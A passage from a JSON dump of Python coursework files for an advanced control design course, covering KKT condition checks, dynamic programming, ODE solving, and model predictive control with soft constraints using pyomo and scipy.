"text": "# KKT conditions \n\n# %% quadratic programming example \n\nimport numpy as np \nimport pyomo.environ as pyo \nfrom pyomo.opt import TerminationCondition\n\nThreshold = 1e-5 \n\nmodel = pyo.ConcreteModel()\nmodel.z1 = pyo.Var()\nmodel.z2 = pyo.Var()\n\nmodel.obj = pyo.Objective(expr = model.z1 **2 + model.z2**2)\n# model.cons1 = pyo.Constraint(expr = 1 <= model.z1)\n# model.cons2 = pyo.Constraint(expr = 1 <= model.z2)\nmodel.cons1 = pyo.Constraint(expr = -model.z1 <= -1)\nmodel.cons2 = pyo.Constraint(expr = -model.z2 <= -1)\n# ---------------------only in the <= form ----------------------------------\n\n\nmodel.dual = pyo.Suffix(direction = pyo.Suffix.IMPORT)\n\nresult = pyo.SolverFactory('ipopt').solve(model)\nprint('dual1 = ',model.dual[model.cons1])\nprint('dual2 = ',model.dual[model.cons2])\nprint('z1*_solver = ',model.z1())\nprint('z2*_solver = ',model.z2())\nprint('opt_value = ',model.obj())\n\n# %% check the status \nif result.solver.termination_condition is not TerminationCondition.optimal:\n KKTsat = False \nelse:\n A = -np.eye(2)\n b= -np.ones((2,1))\n zOpt = np.array([model.z1(),model.z2()])\n u = []\n for c in model.component_objects(pyo.Constraint,active = True):\n print('Constraint',c)\n for i in c:\n u.append(model.dual[c[i]])\n# -------------pay attention to here !!!------------\n print(model.dual[c[i]])\n\n u = np.asarray(u)\n for i in range(len(u)):\n if u[i] < Threshold and u[i] > Threshold:\n u[i] = 0\n \n flag_primal = np.any(\n np.all(A @ zOpt <= b + Threshold) or \n np.all(A @ zOpt <= b - Threshold) \n )\n\n flag_dual = np.all(u >=0 )\n\n flag_cs = np.all(np.multiply(u,(A@zOpt-b)) < Threshold) and np.all(np.multiply(u,(A@zOpt-b)) > -Threshold)\n\n grad_lagrangian = [2*zOpt[0],2*zOpt[1]] + u.T @ A \n\n for i in range(len(grad_lagrangian)):\n if grad_lagrangian[i] < Threshold and grad_lagrangian[i] > -Threshold:\n grad_lagrangian[i] = 0 \n flag_grad = np.all(grad_lagrangian ==0)\n\n flags = [flag_primal,flag_dual,flag_cs,flag_grad]\n if np.all(np.array(flags)==1):\n KKTsat = True\n else:\n KKTsat = False \n\nprint(KKTsat)"
},
{
"alpha_fraction": 0.5378531217575073,
"alphanum_fraction": 0.5793785452842712,
"avg_line_length": 25.81818199157715,
"blob_id": "e7aff05ff01f8af667fd7ad4208ecbf1837f4eff",
"content_id": "a855fbb7cd6091c91cd7a3588532bd71a34a6330",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3540,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 132,
"path": "/py_files/Lab7_DP.py",
"repo_name": "ZionDeng/Advanced-Control-Design",
"src_encoding": "UTF-8",
"text": "# constrained finite time optimal control \n\nimport numpy as np \nfrom scipy import interpolate\nimport multiprocessing\n\n# pool = multiprocessing.Pool(4)\n# print(np.array(range(3)).reshape((3,1)))\n\nA = np.array([1,1,0,1]).reshape((2,2))\nB = np.array([0,1]).reshape((2,1))\n\nNX = 2 \nNU = 1 \n\n\ndef f_dyn(x,u):\n return A @ np.array([x]).reshape((NX,1)) + B @ np.array([u]).reshape((NU,1))\n\nxmin = -15\nxmax = 15 \n\numin = -1 \numax = 1 \n\nN = 3 # horizon \n\nQ = np.eye(NX)\nR = np.array([0.1]).reshape((NU,NU))\nPN = Q \n\n# create function for state cost and 'optimal cost-to-go'\n# cost-to-go is a function of the state and changes with time, \n# store this as a dictionary \n\ndef J_stage(x,u):\n x = np.array([x]).reshape(NX,1)\n u = np.array([u]).reshape(NU,1)\n return x.T @ Q @ x + u.T @ R @ u # return state cost \n\nJopt = {}\nUopt = {}\n\n# grid the x under the constraint \nNx_grid = 50 \nx1_grid = np.linspace(xmin,xmax,Nx_grid)\nx2_grid = np.linspace(xmin,xmax,Nx_grid)\npoints = (x1_grid,x2_grid)\n\n# grid the input space \nNu_grid = 21 \nu_grid = np.linspace(umin,umax,Nu_grid)\n\n# Allocate memory for Jopt and Uopt arrays\n# Jopt[N] is a known, quadratic function (from PN).\nJopt_array = np.nan * np.zeros((Nx_grid,Nx_grid,N+1))\nUopt_array = np.nan * np.zeros((Nx_grid,Nx_grid,N))\n\nfor idx1,x1 in enumerate(x1_grid):\n for idx2,x2 in enumerate(x2_grid):\n x = np.array([x1,x2]).reshape(NX,)\n Jopt_array[idx1,idx2,N] = x.T @ PN @ x\n\n# interpolate the Jopt and Uopt\ndef Jopt_interpolate(x,j):\n return interpolate.interpn(points,Jopt_array[:,:,j],x.flatten())\ndef Uopt_interpolate(u,j):\n return interpolate.interpn(points,Uopt_array[:,:,j],x.faltten())\n\n\n\n\nfor j in reversed(range(N)):\n print('Computing J:',j)\n\n # initialize Jopt_array-1 and uPolicy[j] matrix at iteration\n # loop over the 2-D grid in X\n\n for idx1, x1 in enumerate(x1_grid):\n for idx2,x2 in enumerate(x2_grid):\n xi = np.array([x1,x2]).reshape(NX,)\n\n def fun(u):\n J_j = J_stage(xi,u).flatten() + Jopt_interpolate(f_dyn(xi,u),j+1).flatten()\n return J_j\n\n J_best = np.inf\n U_best = np.NaN\n for u_val in u_grid:\n xi_next = f_dyn(xi,u_val)\n if np.all(xi_next >= xmin) and np.all(xi_next <= xmax):\n J_act = fun(u_val)\n if J_act < J_best:\n U_best = u_val\n J_best = J_act\n Jopt_array[idx1,idx2,j] = J_best\n Uopt_array[idx1,idx2,j] = U_best\nx = np.array([-1,-1])\nprint(Jopt_interpolate(x,0))\n\n\nfrom mpl_toolkits.mplot3d.axes3d import Axes3D\nimport matplotlib.pyplot as plt\nfrom matplotlib import cm\n\nfig, ax = plt.subplots(1, N, figsize=(12, 6))\nfor j in range(N):\n ax[j].contour(Jopt_array[:,:,j], 20, cmap=cm.RdBu, extent=[-15, 15, -15, 15])\n ax[j].set_xlim(-15, 15)\n ax[j].set_ylim(-15, 15)\n ax[j].axis('square')\n plt.xlabel('x1')\n plt.ylabel('x2')\n fig.tight_layout(rect=[0, 0.03, 1, 0.95])\n\nfig = plt.figure(figsize=(12, 6))\nfor j in range(N):\n ax = fig.add_subplot(1, N, j+1)\n ax.imshow(Jopt_array[:,:,j], origin='lower', extent=(-15,15,-15,15))\n ax.axis([-15, 15, -15, 15])\n plt.xlabel('x1')\n plt.ylabel('x2')\n \nfig = plt.figure(figsize=(12, 6))\nfor j in range(N):\n ax = fig.add_subplot(1, N, j+1)\n ax.imshow(Uopt_array[:,:,j], origin='lower', extent=(-15,15,-15,15))\n ax.axis([-15, 15, -15, 15])\n plt.xlabel('x1')\n plt.ylabel('x2')\n\nplt.show()\n"
},
{
"alpha_fraction": 0.5130694508552551,
"alphanum_fraction": 0.5578790307044983,
"avg_line_length": 18.705883026123047,
"blob_id": "853142c12e8bac40f8f652a02f3fb55268cc6364",
"content_id": "49f633fa9389ecd0ac813bc5767df4da370f8d59",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1339,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 68,
"path": "/py_files/lab1_ode.py",
"repo_name": "ZionDeng/Advanced-Control-Design",
"src_encoding": "UTF-8",
"text": "# scipy.intergrate.solve_ivp \nfrom scipy.integrate import solve_ivp\nimport numpy as np \nimport matplotlib.pyplot as plt \n\n# %% solve differential equation \n# x0 = 1, t0 = 0, tf = 20 \n\ndef exp_ode(t,x):\n return np.exp(-x)\n\nx0 = np.array([1])\nt0 = 0 \ntf = 20 \n\n# sol = solve_ivp(exp_ode,[t0,tf], x0) \nsol = solve_ivp(lambda t,x: np.exp(-x),[t0,tf],x0)\n# plt.plot(sol.t,sol.y[0])\n# plt.show()\n\n# %% \n\nsol = solve_ivp(lambda t,x: -x * np.exp(t),[0,5],[1])\n# plt.plot(sol.t,sol.y[0])\n# plt.show()\n\n# %% \nsol = solve_ivp(lambda t,x: (-0.2 + np.sin(t)) * x,[0,5],[5],'RK45',rtol = 1e-6)\n# plt.plot(sol.t,sol.y[0])\n# plt.show()\n\n\n# %% \na0, a1, b0, tf = -2.5, 0.05, 0.25, 15 \n\nx0 = [np.pi/4, 0]\n\ndef dyn_ode(t,x):\n theta, thetadot = x\n return [thetadot, -a0 *np.sin(theta) - a1* thetadot + b0* np.cos(theta)]\n# ---------------WHERE IS U HERE--------------------------??\n\nsol = solve_ivp(dyn_ode,[t0,tf],x0,rtol= 1e-7)\n\n# plt.plot(sol.t,sol.y[0,:])\n# plt.plot(sol.t,sol.y[1,:])\n# plt.show()\n\n# %% analytical differentiation \nimport sympy as sym \n\nx = sym.Symbol('x')\nA = sym.Matrix(np.eye(4) * x)\n# print(A)\n\nA_val = A.subs(x,3)\n# print(A_val)\n\nx, y, z = sym.symbols('x y z')\nJacob = sym.Matrix(\n [sym.cos(y) + x, sym.sin(x) + y, z]\n).jacobian([x,y,z])\n# print(Jacob)\n\nJacob_val = Jacob.subs([\n (x,0), (y, np.pi/4)\n])\nprint(Jacob_val)"
},
{
"alpha_fraction": 0.5270795822143555,
"alphanum_fraction": 0.5506472587585449,
"avg_line_length": 33.64788818359375,
"blob_id": "d7873dd9f9827edbe01e0ce972e53bc1642ecb18",
"content_id": "1c9c6c9c344117e08022aa7718e73414c8281f51",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 17227,
"license_type": "no_license",
"max_line_length": 150,
"num_lines": 497,
"path": "/py_files/Lab11_MPCII.py",
"repo_name": "ZionDeng/Advanced-Control-Design",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport scipy.signal\nimport scipy.linalg\nfrom scipy.integrate import solve_ivp\nimport matplotlib.pyplot as plt\n# from __future__ import division\nimport pyomo.environ as pyo\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy import signal\n\n\nTs = 0.1 # Ts is the discrete sample-time. \n\n\nAc = np.array([[0, 1],\n [2.5, -0.05]])\nBc = np.array([[0],\n [2.5]])\n\nCc = np.array([1, 0])\n# We don't need D here. This is just for calling the function\nDc = np.zeros((1,1))\nsystem = (Ac, Bc, Cc, Dc)\nA, B, C, D, dt = scipy.signal.cont2discrete(system, Ts)\n\nQ = np.diag([100,1])\nR = np.array([1]).reshape(1,1)\nP = Q\nN = 6\n\nuU = 1.75\nuL = -1.75\nx1U = np.pi/2\nx2U = np.pi\n\nC = C.reshape(1,2)\n\n# %% case one: full review \n# Setup optimization problem\ndef solve_cftoc(A, B, P, Q, R, N, x0, x1U, x2U, uL, uU, xref, uref):\n \n model = pyo.ConcreteModel()\n model.N = N\n model.nx = np.size(A, 0)\n model.nu = np.size(B, 1)\n\n \n # length of finite optimization problem:\n model.tIDX = pyo.Set( initialize= range(model.N+1), ordered=True )\n model.xIDX = pyo.Set( initialize= range(model.nx), ordered=True )\n model.uIDX = pyo.Set( initialize= range(model.nu), ordered=True )\n \n \n # these are 2d arrays:\n model.A = A\n model.B = B\n model.Q = Q\n model.P = P\n model.R = R\n \n model.xref = xref\n model.uref = uref \n \n # Create state and input variables trajectory:\n model.x = pyo.Var(model.xIDX, model.tIDX)\n model.u = pyo.Var(model.uIDX, model.tIDX, bounds=(uL,uU))\n\n \n #Objective:\n def objective_rule(model):\n costX = 0.0\n costU = 0.0\n costTerminal = 0.0\n for t in model.tIDX:\n for i in model.xIDX:\n for j in model.xIDX:\n if t < model.N:\n costX += (model.x[i, t] - model.xref[i, t]) * model.Q[i, j] * (model.x[j, t] - model.xref[j, t]) \n for t in model.tIDX:\n for i in model.uIDX:\n for j in model.uIDX:\n if t < model.N:\n costU += (model.u[i, t] - model.uref[i, t]) * model.R[i, j] * (model.u[j, t] - model.uref[j, t])\n for i in model.xIDX:\n for j in model.xIDX: \n costTerminal += (model.x[i, model.N] - model.xref[i, model.N]) * model.P[i, j] * (model.x[j, model.N] - model.xref[j, model.N])\n return costX + costU + costTerminal\n \n model.cost = pyo.Objective(rule = objective_rule, sense=pyo.minimize)\n \n # Constraints:\n def equality_const_rule(model, i, t):\n return model.x[i, t+1] - (sum(model.A[i, j] * model.x[j, t] for j in model.xIDX)\n + sum(model.B[i, j] * model.u[j, t] for j in model.uIDX) ) == 0.0 if t < model.N else pyo.Constraint.Skip\n\n model.equality_constraints = pyo.Constraint(model.xIDX, model.tIDX, rule=equality_const_rule)\n model.init_const1 = pyo.Constraint(expr = model.x[0, 0] == x0[0])\n model.init_const2 = pyo.Constraint(expr = model.x[1, 0] == x0[1])\n \n model.state_limit1 = pyo.Constraint(model.tIDX, rule=lambda model, t: model.x[0, t] <= x1U\n if t < N else pyo.Constraint.Skip)\n model.state_limit2 = pyo.Constraint(model.tIDX, rule=lambda model, t: -x1U <= model.x[0, t]\n if t < N else pyo.Constraint.Skip)\n model.state_limit3 = pyo.Constraint(model.tIDX, rule=lambda model, t: model.x[1, t] <= x2U\n if t < N else pyo.Constraint.Skip)\n model.state_limit4 = pyo.Constraint(model.tIDX, rule=lambda model, t: -x2U <= model.x[1, t]\n if t < N else pyo.Constraint.Skip)\n \n solver = pyo.SolverFactory('ipopt')\n results = solver.solve(model)\n \n if str(results.solver.termination_condition) == \"optimal\":\n feas = True\n else:\n feas = False\n \n xOpt = np.asarray([[model.x[i,t]() for i in model.xIDX] for t in model.tIDX]).T\n uOpt = np.asarray([model.u[:,t]() for t in model.tIDX]).T\n \n JOpt = model.cost()\n \n return [model, feas, xOpt, uOpt, JOpt]\n\n\n\nnx = np.size(A, 0) # number of states\nnu = np.size(B, 1) # number of inputs\nny = np.size(C, 0) # number of outputs\n\nx0 = np.array([-0.5, 1.0])\nLsim = 70 # length of simulation\nref = []\n\n# Construct reference signal\nfor k in range(Lsim+N+1):\n if k < 40: \n ref.append(0)\n else:\n ref.append(1)\n\n# Initialize Control Design\n\numpc_closedloop = []\nym = []\nxk_open = np.zeros((nx, N+1)) # to plot open-loop trajectories\nxk_closed = np.zeros((nx, Lsim+1)) # to plot closed-loop trajectories\nxk_closed[:, 0] = x0 # set initial value of closed-loop trajectory\nxk = x0.reshape(2,1)\nfig = plt.figure(figsize=(12, 8))\nax1 = fig.add_subplot(221)\nax2 = fig.add_subplot(222)\n\n# simulate MPC controller\nfor t in range(Lsim):\n\n# Target Algorithm \n # construct reference preview\n ref_preview = [ref[j] for j in range(t, t+N+1)]\n# ref_preview = ref[t:t+N+1]\n # compute xref and uref based on futture reference\n xrefk = np.zeros((nx,N+1))\n urefk = np.zeros((nu,N))\n for k in range(N+1):\n Geq = np.vstack( ( np.hstack( (A-np.eye(nx), B) ), np.hstack( (C , np.zeros((ny,nu))) ) ) )\n beq = np.concatenate([np.zeros((nx,1)), np.asarray(ref_preview[k]).reshape(1,1)], axis = 0) \n\n # If Geq invertible\n # inv(G)*b according to slides \n out = (np.linalg.inv(Geq) @ beq).flatten()\n xrefk[:, k] = out[0:nx]\n if k is not N:\n urefk[:, k] = out[nx:nx+nu]\n\n # Solve MPC \n [model, feas, xOpt, uOpt, JOpt] = solve_cftoc(A, B, P, Q, R, N, xk.reshape(2,), x1U, x2U, uL, uU, xrefk, urefk)\n if feas == False:\n print('The problem is infeasible')\n U = uOpt[0,0]\n umpc_closedloop.append(U)\n \n if (t < (Lsim-N)):\n # plot open-loop trajectories\n xk_open[:, 0] = xk.reshape(2,)\n\n for m in range(N):\n xk_open[:, m+1] = A @ xk_open[:, m] + B @ uOpt[:, m] \n\n line1 = ax1.plot(range(t, t+len(ref_preview) ), xk_open[0,:], 'o-', color='b')\n line2 = ax2.plot(range(t, t+len(ref_preview) ), xk_open[1,:], 'o-', color='b')\n\n # Plant model update\n ym.append(C @ xk)\n xk = A @ xk + B @ np.asarray(U).reshape(1,1)\n xk_closed[:, t+1] = xk.reshape(2,)\n \n##################################################################################################################\n##################################################################################################################\n# plot closed-loop trajectories\nline11 = ax1.plot(range(Lsim), xk_closed[0, :Lsim], 'o-', color='r')\nax1.legend([line1[0], line11[0]], ['open-loop trajectory', 'closed-loop trajectory'])\nax1.set_ylabel('x1')\nline22 = ax2.plot(range(Lsim), xk_closed[1, :Lsim], 'o-', color='r')\nax2.legend([line2[0], line22[0]], ['open-loop trajectory', 'closed-loop trajectory'])\nax2.set_ylabel('x2')\n# plt.show()\n\n# Plot Results\nax12 = fig.add_subplot(223)\nax22 = fig.add_subplot(224)\nax12.step(range(len(umpc_closedloop)), umpc_closedloop,'r')\nax12.legend(['u'])\nax22.step(range(len(ym)), np.asarray(ym).reshape(Lsim,), 'r')\nax22.step(range(len(ref)), ref, 'b--')\nax22.legend([line2[0], line22[0]], ['r', 'y'])\nplt.tight_layout()\nplt.show()\n\n# print('x1=', xrefk[0,:])\n# print('x2=', xrefk[1,:])\n# print('u=', urefk)\n\n\n# %% preview is not available \n\n\n# %% soft constraint \n# state constraint\nx1U = np.pi/4\nx2U = np.pi/2\n\n\n\nnx = np.size(A, 0) # number of states\nnu = np.size(B, 1) # number of inputs\nny = np.size(C, 0) # number of outputs\n\nx0 = np.array([-0.5, 1.0])\nLsim = 70 # length of simulation\nref = []\n\n# Construct reference signal\nfor k in range(Lsim+N+1):\n if k < 40: \n ref.append(0)\n else:\n ref.append(1)\n\n# Initialize Control Design\n\numpc_closedloop = []\nym = []\nxk_open = np.zeros((nx, N+1)) # to plot open-loop trajectories\nxk_closed = np.zeros((nx, Lsim+1)) # to plot closed-loop trajectories\nxk_closed[:, 0] = x0 # set initial value of closed-loop trajectory\nxk = x0.reshape(2,1)\n\n# simulate MPC controller\nfor t in range(Lsim):\n\n# Target Algorithm \n # construct reference preview\n ref_preview = [ref[j] for j in range(t, t+N+1)]\n# ref_preview = ref[t:t+N+1]\n # compute xref and uref based on futture reference\n xrefk = np.zeros((nx,N+1))\n urefk = np.zeros((nu,N))\n for k in range(N+1):\n Geq = np.vstack( ( np.hstack( (A-np.eye(nx), B) ), np.hstack( (C , np.zeros((ny,nu))) ) ) )\n beq = np.concatenate([np.zeros((nx,1)), np.asarray(ref_preview[k]).reshape(1,1)], axis = 0) \n\n # If Geq invertible\n out = (np.linalg.inv(Geq) @ beq).flatten()\n xrefk[:, k] = out[0:nx]\n if k is not N:\n urefk[:, k] = out[nx:nx+nu]\n\n # Solve MPC \n [model, feas, xOpt, uOpt, JOpt] = solve_cftoc(A, B, P, Q, R, N, xk.reshape(2,), x1U, x2U, uL, uU, xrefk, urefk)\n if feas == False:\n print('The problem is infeasible')\n U = uOpt[0,0]\n umpc_closedloop.append(U)\n \n if (t < (Lsim-N)):\n # plot open-loop trajectories\n xk_open[:, 0] = xk.reshape(2,)\n\n for m in range(N):\n xk_open[:, m+1] = A @ xk_open[:, m] + B @ uOpt[:, m] \n\n # Plant model update\n ym.append(C @ xk)\n xk = A @ xk + B @ np.asarray(U).reshape(1,1)\n xk_closed[:, t+1] = xk.reshape(2,)\n \ndef solve_cftoc_with_slack(A, B, P, Q, R, N, x0, x1U, x2U, uL, uU, xref, uref, tuning_param):\n \n model = pyo.ConcreteModel()\n model.N = N\n model.nx = np.size(A, 0)\n model.nu = np.size(B, 1)\n \n model.ro_tuning = tuning_param \n \n # length of finite optimization problem:\n model.tIDX = pyo.Set( initialize= range(model.N+1) )\n model.xIDX = pyo.Set( initialize= range(model.nx) )\n model.uIDX = pyo.Set( initialize= range(model.nu))\n \n \n # these are 2d arrays:\n model.A = A\n model.B = B\n model.Q = Q\n model.P = P\n model.R = R\n \n model.xref = xref\n model.uref = uref \n \n # Create state and input variables trajectory:\n model.x = pyo.Var(model.xIDX, model.tIDX)\n model.u = pyo.Var(model.uIDX, model.tIDX, bounds=(uL,uU))\n model.epsU = pyo.Var(model.xIDX, model.tIDX, domain=pyo.NonNegativeReals) # Slack variable is introduced \n\n \n #Objective:\n def objective_rule(model):\n costX = 0.0\n costU = 0.0\n costTerminal = 0.0\n# CostSoftPenaltyEpsL = 0.0\n CostSoftPenaltyEpsU = 0.0\n for t in model.tIDX:\n for i in model.xIDX:\n for j in model.xIDX:\n if t < model.N:\n costX += (model.x[i, t] - model.xref[i, t]) * model.Q[i, j] * (model.x[j, t] - model.xref[j, t]) \n CostSoftPenaltyEpsU += model.epsU[i,t] * model.epsU[j,t] # penalty on the slack variable (quadratic term)\n CostSoftPenaltyEpsU += model.ro_tuning[i] * model.epsU[i,t] # penalty on the slack variable (linear term)\n \n for t in model.tIDX:\n for i in model.uIDX:\n for j in model.uIDX:\n if t < model.N:\n costU += (model.u[i, t] - model.uref[i, t]) * model.R[i, j] * (model.u[j, t] - model.uref[j, t])\n for i in model.xIDX:\n for j in model.xIDX: \n costTerminal += (model.x[i, model.N] - model.xref[i, model.N]) * model.P[i, j] * (model.x[j, model.N] - model.xref[j, model.N])\n \n return costX + costU + costTerminal + CostSoftPenaltyEpsU \n \n model.cost = pyo.Objective(rule = objective_rule, sense=pyo.minimize)\n \n # Constraints:\n def equality_const_rule(model, i, t):\n return model.x[i, t+1] - (sum(model.A[i, j] * model.x[j, t] for j in model.xIDX)\n + sum(model.B[i, j] * model.u[j, t] for j in model.uIDX) ) == 0.0 if t < model.N else pyo.Constraint.Skip\n\n model.equality_constraints = pyo.Constraint(model.xIDX, model.tIDX, rule=equality_const_rule)\n model.init_const1 = pyo.Constraint(expr = model.x[0, 0] == x0[0])\n model.init_const2 = pyo.Constraint(expr = model.x[1, 0] == x0[1])\n \n model.state_limit1 = pyo.Constraint(model.tIDX, rule=lambda model, t: model.x[0, t] <= x1U + model.epsU[0,t]\n if t < N else pyo.Constraint.Skip)\n model.state_limit2 = pyo.Constraint(model.tIDX, rule=lambda model, t: -x1U <= model.x[0, t]\n if t < N else pyo.Constraint.Skip)\n model.state_limit3 = pyo.Constraint(model.tIDX, rule=lambda model, t: model.x[1, t] <= x2U + model.epsU[1,t]\n if t < N else pyo.Constraint.Skip)\n model.state_limit4 = pyo.Constraint(model.tIDX, rule=lambda model, t: -x2U <= model.x[1, t]\n if t < N else pyo.Constraint.Skip)\n\n \n \n solver = pyo.SolverFactory('ipopt')\n results = solver.solve(model)\n \n if str(results.solver.termination_condition) == \"optimal\":\n feas = True\n else:\n feas = False\n \n xOpt = np.asarray([[model.x[i,t]() for i in model.xIDX] for t in model.tIDX]).T\n uOpt = np.asarray([model.u[:,t]() for t in model.tIDX]).T\n epsU_Opt = np.asarray([[model.epsU[i,t]() for i in model.xIDX] for t in model.tIDX]).T\n \n JOpt = model.cost()\n \n return [model, feas, xOpt, epsU_Opt, uOpt, JOpt]\n\n\n\n\ntuning_param = np.array([0,1]) # The tuning parameter for linear penalty term for the slack variable \n\nnx = np.size(A, 0) # number of states\nnu = np.size(B, 1) # number of inputs\nny = np.size(C, 0) # number of outputs\n\nx0 = np.array([-0.5, 1])\nref = []\n\n# Construct reference signal\nfor k in range(Lsim+N+1):\n if k < 40: \n ref.append(0)\n else:\n ref.append(1)\n\n# Initialize Control Design\n\numpc_closedloop = []\nym = []\nepsU_open1 = []\nepsU_open2 = []\nxk_open = np.zeros((nx, N+1)) # to plot open-loop trajectories\nxk_closed = np.zeros((nx, Lsim+1)) # to plot closed-loop trajectories\nxk_closed[:, 0] = x0 # set initial value of closed-loop trajectory\nxk = x0.reshape(2,1)\nfig = plt.figure(figsize=(12, 8))\nax1 = fig.add_subplot(221)\nax2 = fig.add_subplot(222)\n# simulate MPC controller\nfor t in range(Lsim):\n\n# Target Algorithm \n # construct reference preview\n ref_preview = [ref[j] for j in range(t, t+N+1)]\n # compute xref and uref based on futture reference\n xrefk = np.zeros((nx,N+1))\n urefk = np.zeros((nu,N))\n for k in range(N+1):\n Geq = np.vstack( ( np.hstack( (A-np.eye(nx), B) ), np.hstack( (C , np.zeros((ny,nu))) ) ) )\n beq = np.concatenate([np.zeros((nx,1)), np.asarray(ref_preview[k]).reshape(1,1)], axis = 0) \n\n # If Geq invertible\n out = (np.linalg.inv(Geq) @ beq).flatten()\n xrefk[:, k] = out[0:nx]\n if k is not N:\n urefk[:, k] = out[nx:nx+nu]\n\n # Solve MPC \n [model, feas, xOpt, epsU_Opt, uOpt, JOpt] = solve_cftoc_with_slack(A, B, P, Q, R, N, xk.reshape(2,), x1U, x2U, uL, uU, xrefk, urefk, tuning_param)\n if feas == False:\n print('The problem is infeasible')\n U = uOpt[0,0]\n umpc_closedloop.append(U)\n \n if (t < (Lsim-N)):\n epsU_open1.append(epsU_Opt[0, 0])\n epsU_open2.append(epsU_Opt[1, 0])\n # plot open-loop trajectories\n xk_open[:, 0] = xk.reshape(2,)\n\n for m in range(N):\n xk_open[:, m+1] = A @ xk_open[:, m] + B @ uOpt[:, m]\n\n line1 = ax1.plot(range(t, t+len(ref_preview) ), xk_open[0,:], 'o-', color='b')\n line2 = ax2.plot(range(t, t+len(ref_preview) ), xk_open[1,:], 'o-', color='b')\n\n # Plant model update\n ym.append(C @ xk)\n xk = A @ xk + B @ np.asarray(U).reshape(1,1)\n xk_closed[:, t+1] = xk.reshape(2,)\n \n##################################################################################################################\n##################################################################################################################\n# plot closed-loop trajectories\nline11 = ax1.plot(range(Lsim), xk_closed[0, :Lsim], 'o-', color='r')\nax1.legend([line1[0], line11[0]], ['open-loop trajectory', 'closed-loop trajectory'])\nax1.set_ylabel('x1')\nline22 = ax2.plot(range(Lsim), xk_closed[1, :Lsim], 'o-', color='r')\nax2.legend([line2[0], line22[0]], ['open-loop trajectory', 'closed-loop trajectory'])\nax2.set_ylabel('x2')\n# plt.show()\n\n# Plot Results\nax12 = fig.add_subplot(223)\nax22 = fig.add_subplot(224)\nax12.step(range(len(umpc_closedloop)), umpc_closedloop,'r')\nax12.legend(['u'])\nax22.step(range(len(ym)), np.asarray(ym).reshape(Lsim,), 'r')\nax22.step(range(len(ref)), ref, 'b--')\nax22.legend([line2[0], line22[0]], ['r', 'y'])\nplt.tight_layout()\nplt.show()\n\n# print('x1=', xrefk[0,:])\n# print('x2=', xrefk[1,:])\n# print('u=', urefk)\nfig = plt.figure(figsize=(8, 6))\nprint(len(epsU_open1))\nplt.plot(range(len(epsU_open1)), epsU_open1) # slack variable\nplt.plot(range(len(epsU_open2)), epsU_open2) #slack variable\nplt.legend(['epsU1', 'epsU2'])\nplt.show()\n\n\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.5226244330406189,
"alphanum_fraction": 0.5778927206993103,
"avg_line_length": 24.766666412353516,
"blob_id": "98c24ad906d4916f30a7b57ade790af888a51bdc",
"content_id": "365b2af74cfe3ae0f6f6ec7232d45d4e6c6db033",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3094,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 120,
"path": "/py_files/HW1_modeling.py",
"repo_name": "ZionDeng/Advanced-Control-Design",
"src_encoding": "UTF-8",
"text": "# %% P1 \n\nfrom numpy import sin,cos,tan,arcsin \nimport numpy as np \nimport sympy as sym \nimport matplotlib.pyplot as plt \n\nm,l,g,a,k,d,beta = 2,6,9.81,3,1.5,1,0.1\n\ndef EquilPoint(theta2_bar, alpha_bar):\n Fsd_bar = (m * g* l *sin(theta2_bar) +alpha_bar) / (a * cos(theta2_bar))\n theta1_bar = arcsin(sin(theta2_bar) - Fsd_bar/(k*a))\n T_bar = - (m*g*l * sin(theta1_bar) + a*cos(theta1_bar) * Fsd_bar)\n return theta1_bar, T_bar\n\n# print(EquilPoint(0.1,0.5))\n\n# %% \ntheta1dot, theta2dot = 0,0\ndef LinearizeModel(theta2,alpha):\n theta1, T = EquilPoint(theta2,alpha)\n\n x1, x2, x3, x4, u1, u2 = sym.symbols('x1 x2 x3 x4 u1 u2')\n f = sym.Matrix(\n [x2, \n (m*g*l * sym.sin(x1) + a**2*sym.cos(x1) *(k*(sym.sin(x3) -sym.sin(x1))+ d*(x4-x2)) + u1)/ (m*l**2),\n x4,\n (m*g*l*sym.sin(x3) - a**2*sym.cos(x3)*(k*(sym.sin(x3)-sym.sin(x1))+d*(x4-x2))+u2+beta*x4**2)/(m*l**2)]\n )\n A = f.jacobian([x1,x2,x3,x4,u1,u2]).subs([\n (x1,theta1),(x2,theta1dot),(x3,theta2),(x4,theta2dot),(u1,T),(u2,alpha)\n ])\n\n # WHY DOES A RELATED TO U1,U2????\n B = f.jacobian([u1,u2]).subs([\n (x1,theta1),(x2,theta1dot),(x3,theta2),(x4,theta2dot),(u1,T),(u2,alpha)\n ])\n C = [1,0,0,0]\n D = [0,0]\n return A,B,C,D,theta1,T\n\ntheta2_bar = 0.1\nalpha_bar = 0.5\n# print(LinearizeModel(theta2_bar,alpha_bar))\n\n# %% \ndef bldgHTM(T, u1,u2,q,mz,cz,cp):\n Tdot = (q + cp*u1*(u2-T))/(mz*cz)\n\nmz, cz, Ts, cp = 100,20,0.1,1000\n\ndef eulerDiscretization(T,q,u1,u2):\n T_KplusOne = (1-cp*Ts/(mz*cz)*u1) *T + Ts/(mz*cz)*(q+cp*u1*u2)\n return T_KplusOne\n\n# %% P3 \nlr = 1.738\ndt = 0.1 \ndef carModel(beta,a,x,y,psi,v):\n x_dot = v*cos(psi+beta)\n y_dot = v*sin(psi+beta)\n psi_dot = v/lr*sin(beta)\n v_dot = a \n return x+x_dot*dt, y+y_dot*dt,psi+psi_dot*dt,v+v_dot*dt\n\n# print(carModel(.1, 2, 5, 2,10,0.1))\nfrom scipy.io import loadmat \nData = loadmat('Data/sineData.mat')\na = Data['a']\nbeta = Data['beta']\ntime = Data['time']\nTs = 0.1 \nNum_steps = len(time)\n\ndef sim(time,a,beta,x0):\n \n x,y,psi,v = x0 \n # initialize the arrays\n xtrend, ytrend, psi_trend,v_trend = [x],[y],[psi],[v]\n # use the function to iterate \n for i in range(Num_steps-1):\n x,y,psi,v = carModel(beta[i],a[i],x,y,psi,v)\n xtrend.append(x)\n ytrend.append(y)\n psi_trend.append(psi)\n 